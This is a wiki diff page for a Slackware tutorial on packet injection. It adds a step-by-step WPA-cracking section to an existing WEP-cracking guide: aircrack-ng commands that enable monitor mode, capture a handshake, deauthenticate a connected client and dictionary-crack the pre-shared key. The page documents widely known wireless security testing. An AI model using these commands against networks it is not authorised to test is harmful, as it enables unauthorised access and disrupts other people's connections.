Differences

This shows you the differences between two versions of the page.

--- slackware:packet_injection [2011/06/21 23:41] – slack
+++ slackware:packet_injection [2019/11/07 17:58] (current) – external edit 127.0.0.1
@@ Line 44: / Line 44: @@
 make unload
 </code>
+====== Cracking WEP ======
 Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack|WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].  But the main steps (drawing heavily on the above tutorial):
@@ Line 166: / Line 168: @@
 You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The ”#/s” should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second.
-. Terminal 3: Run aircrack-ng to obtain the WEP key
+===== 6. Terminal 3: Run aircrack-ng to obtain the WEP key =====
 The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.
@@ Line 200: / Line 202: @@
       Probability: 100%
 </code>
+====== Cracking WPA ======
+===== 1. Put the Wireless Interface into Monitor Mode =====
+<code bash>
+airmon-ng start wlan0 9
+</code>
+Final number is the channel.  From now on refer to this device as mon0 (because we're using mac80211 drivers).
+===== 2. Listen for a Handshake =====
+The handshake is the only interesting and useful part of communication between AP and client.
+<code bash>
+ airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0
+</code>
+Where:
+  * -c 9 is the channel for the wireless network
+  * --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
+  * -w psk is the file name prefix for the file which will contain the IVs.
+  * mon0 is the interface name.
+Success looks like this -- notice the "WPA handshake:..." in the top right.
+<code bash>
+  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
+  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
+:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy
+  BSSID              STATION            PWR  Lost  Packets  Probes
+:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116
+</code>
+===== 3. (if necessary) Deauthenticate a client to capture a handshake =====
+You can just wait for a handshake, but if there's a connected client, aireplay can attempt to deauthenticate it, forcing it to re-handshake.
+<code bash>
+ aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
+</code>
+Where:
+  * -0 means deauthentication
+  * 1 is the number of deauths to send (you can send multiple if you wish)
+  * -a 00:14:6C:7E:40:80 is the MAC address of the access point
+  * -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
+  * ath0 is the interface name
+===== 4. Crack the pre-shared key =====
+<code bash>
+aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
+</code>
+Where:
+  * -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
+  * *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.